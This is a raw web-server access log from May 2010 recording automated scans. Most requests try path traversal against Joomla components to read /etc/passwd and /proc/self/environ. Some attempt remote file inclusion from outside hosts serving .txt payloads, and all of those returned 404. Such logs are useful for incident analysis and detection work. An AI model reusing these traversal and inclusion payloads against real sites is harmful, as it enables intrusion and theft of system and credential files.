124.217.229.185 - - [23/May/2010:08:38:25 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.13.42 - - [23/May/2010:08:38:33 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [23/May/2010:08:38:35 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:38:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.204.233 - - [23/May/2010:08:39:02 -0500] "GET /logs/access_log.1177545600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.108.66.144 - - [23/May/2010:08:39:29 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
218.149.84.14 - - [23/May/2010:08:39:30 -0500] "GET /logs/access_log.1271548800/playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:39:59 -0500] "GET /logs/access_log.1273017600%20/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.167.140.113 - - [23/May/2010:08:42:19 -0500] "GET /logs/access_log.1223683200//png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.834"
124.217.229.185 - - [23/May/2010:08:43:05 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:06 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:14 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:15 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:18 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:18 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:23 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:24 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:29 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:30 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:37 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:38 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:53 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:54 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:57 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:43:58 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:00 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:00 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
220.194.62.53 - - [23/May/2010:08:44:13 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:44:13 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:44:13 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
124.217.229.185 - - [23/May/2010:08:44:15 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:15 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:15 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:16 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:17 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:17 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:30 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:31 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:40 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:41 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:44:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
220.194.62.53 - - [23/May/2010:08:45:45 -0500] "GET /logs/access_log.1273017600%20/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:46:13 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:46:13 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:46:29 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:46:29 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [23/May/2010:08:47:13 -0500] "GET /logs/access_log.1160697600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.71.32.29 - - [23/May/2010:08:47:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.108.66.144 - - [23/May/2010:08:48:01 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
220.194.62.53 - - [23/May/2010:08:48:03 -0500] "GET /logs/access_log.1273622400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:48:03 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:48:03 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:49:45 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:49:45 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:49:50 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:50:16 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:50:16 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.65.166.74 - - [23/May/2010:08:51:40 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
80.65.166.74 - - [23/May/2010:08:51:41 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
87.250.255.243 - - [23/May/2010:08:52:06 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.53 - - [23/May/2010:08:52:32 -0500] "GET /logs/access_log.1227225600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.194.62.53 - - [23/May/2010:08:53:00 -0500] "GET /logs/access_log.1273622400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:53:00 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:53:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.30.220.16 - - [23/May/2010:08:54:55 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:54:56 -0500] "GET /logs/index.php?option=com_otzivi&controller=../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:54:58 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:54:59 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:00 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:02 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
207.46.199.47 - - [23/May/2010:08:55:02 -0500] "GET /logs/access_log.1232755200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.30.220.16 - - [23/May/2010:08:55:03 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:04 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:06 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:07 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:08 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:10 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:11 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:11 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:13 -0500] "GET /index.php?option=com_otzivi&controller=../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:14 -0500] "GET /index.php?option=com_otzivi&controller=../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:15 -0500] "GET /index.php?option=com_otzivi&controller=../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:17 -0500] "GET /index.php?option=com_otzivi&controller=../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:18 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
87.250.255.243 - - [23/May/2010:08:55:18 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.30.220.16 - - [23/May/2010:08:55:19 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:21 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:22 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:23 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:25 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:29 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
94.30.220.16 - - [23/May/2010:08:55:30 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.830"
87.250.255.243 - - [23/May/2010:08:56:15 -0500] "GET /logs/access_log.1243728000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
220.194.62.53 - - [23/May/2010:08:57:53 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:57:53 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:57:53 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:09:02:02 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:09:02:05 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.71.32.29 - - [23/May/2010:09:02:22 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
64.71.32.29 - - [23/May/2010:09:02:33 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
64.71.32.29 - - [23/May/2010:09:03:08 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
220.194.62.53 - - [23/May/2010:09:03:39 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.43.88.242 - - [23/May/2010:09:06:20 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.204.189 - - [23/May/2010:09:07:02 -0500] "GET /tattoo/ HTTP/1.1" 200 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.108.66.144 - - [23/May/2010:09:08:24 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
89.108.66.144 - - [23/May/2010:09:08:29 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
121.88.4.141 - - [23/May/2010:09:08:56 -0500] "GET ////download.php?board_skin_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:09:08:56 -0500] "GET /logs/access_log.1273104000////download.php?board_skin_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:09:08:56 -0500] "GET /logs////download.php?board_skin_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:09:09:15 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:09:09:15 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
121.88.4.141 - - [23/May/2010:09:10:54 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:09:10:55 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:09:10:57 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:09:10:57 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:09:10:57 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
121.88.4.141 - - [23/May/2010:09:11:11 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:09:11:11 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
